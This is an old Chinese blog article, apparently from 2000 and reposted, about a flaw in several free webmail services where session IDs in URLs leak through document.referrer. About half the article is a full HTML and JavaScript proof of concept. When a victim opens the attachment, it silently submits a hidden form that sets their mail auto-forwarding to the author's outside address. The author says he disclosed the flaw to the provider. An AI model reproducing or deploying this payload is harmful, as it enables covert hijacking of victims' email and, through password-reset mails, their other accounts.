《目前国内一些免费email存在的一个安全漏洞》

    技术2022-05-11  100

    该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...     看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=( 最好不要随便打开别人发给你的HTML文件...   我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登 录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen") 及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理 及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发 给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时 他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过 该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体 是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的 邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...   该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....   (该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就   不知道了。)                                           -----学别人一句"转载请注明出处"~ ---                                     shell(shelltools@21cn.com) http://shelltools.yeah.net                                                       2000/6/14        〈HTML〉 〈HEAD〉 〈TITLE〉小心用Web方式收信〈/TITLE〉 〈/HEAD〉 〈BODY〉          网管,你好:           ****的自动转发等操作存在一些安全问题,在Email用户用〈br〉       WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉       中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉       的Script。这个问题在国内的几个免费email中都存在。〈br〉           (如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉             应该被设为"ShellTools@21cn.com"了)                                                     ****用户  shell                                                                                 〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉       〈input type=hidden name=SuUser value=〉       〈input type=hidden name=Request value=EditDone 〉       〈input type=hidden  name="B1"  value=" 更新 "〉       〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉       〈/form〉       〈SCRIPT Language=JScript〉        var sr=document.referrer;       var isr;       sr=sr.substring(7,30);       isr=sr.indexOf("/");       sr="http://" + sr.substring(0,isr) + "/Banner.htm";       var sr2=document.referrer;       isr=sr2.indexOf("ReadMiscPart");       if ( isr 〉 20 ){ aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no");        aw.document.write('〈HTML〉');        aw.document.write('〈HEAD〉');         aw.document.write('〈title〉设置自动转发〈/title〉');         aw.document.write('〈/head〉');       aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');       aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');       aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');       aw.document.write('〈noframes〉');       aw.document.write('〈body〉');       aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');       aw.document.write('〈/body〉');       aw.document.write('〈/noframes〉');       aw.document.write('〈/frameset〉');         aw.document.write('〈/html〉 ');       sr2 = sr2.substring(0,isr);          document.AddUserForm.action= sr2 + "AutoForward.gen";       document.AddUserForm.submit();}       window.focus();        〈/SCRIPT〉     〈/BODY〉 〈/HTML〉

    最新回复(0)